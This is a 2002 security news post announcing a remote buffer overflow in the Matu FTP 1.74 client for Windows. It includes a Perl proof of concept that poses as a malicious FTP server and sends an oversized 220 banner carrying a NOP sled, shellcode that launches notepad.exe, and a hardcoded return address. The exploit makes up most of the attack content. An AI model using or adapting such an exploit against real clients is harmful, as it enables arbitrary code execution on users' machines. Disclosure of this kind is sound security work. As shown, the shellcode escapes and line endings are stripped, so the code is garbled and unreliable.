Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Matu FTP remote buffer overflow vulnerability

Matu FTP remote buffer overflow vulnerability

by Nikola Strahija on April 23rd, 2002 Matu FTP is a Japanese FTP client software for Win32 Platform. It was found an exploitable buffer overflow problem in Matu FTP Version 1.74.


The buffer overflow occurs when a long string like

220 AAAAAAAAAAAAAAAAA.....AAAAAAAAAAAAAAA

is received by Matu FTP in the beginning of an FTP session.
This vulnerability allows malicious FTP server to execute
an arbitrary code on client hosts.


/*---------------------------
Vendor Status
---------------------------*/
Notified with no response


/*---------------------------
POC
---------------------------*/
This exploit code is invoked as an FTP server through inetd.

#!/usr/local/bin/perl

#------------------------------------------------------
# Matu Ftp Version 1.74 exploit for Windows2000 Professional (SP2)
# ( run under inetd )
# written by Kanatoko
# http://www.jumperz.net/
#------------------------------------------------------
$|=1;

#egg written by UNYUN (http://www.shadowpenguin.org/)
$egg = "xEBx27x8Bx34x24x33xC9x33xD2xB2";
$egg .= "x0Bx03xF2x88x0Ex2BxF2xB8xAFxA7";
$egg .= "xE6x77xB1x05xB2x04x2BxE2x89x0C";
$egg .= "x24x2BxE2x89x34x24xFFxD0x90xEB";
$egg .= "xFDxE8xD4xFFxFFxFF";
$egg .= "notepad.exe";

#egg_address = 0x0012F43C
$buf = "x90" x 217;
$buf .= $egg;
$buf .= "A" x 2;
$buf .= "x3CxF4x12x00";
$buf .= "B" x 80;

print "220 $bufrn";

--

#sorry for the bad english

Kanatoko
http://www.jumperz.net/(Japanese)



Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »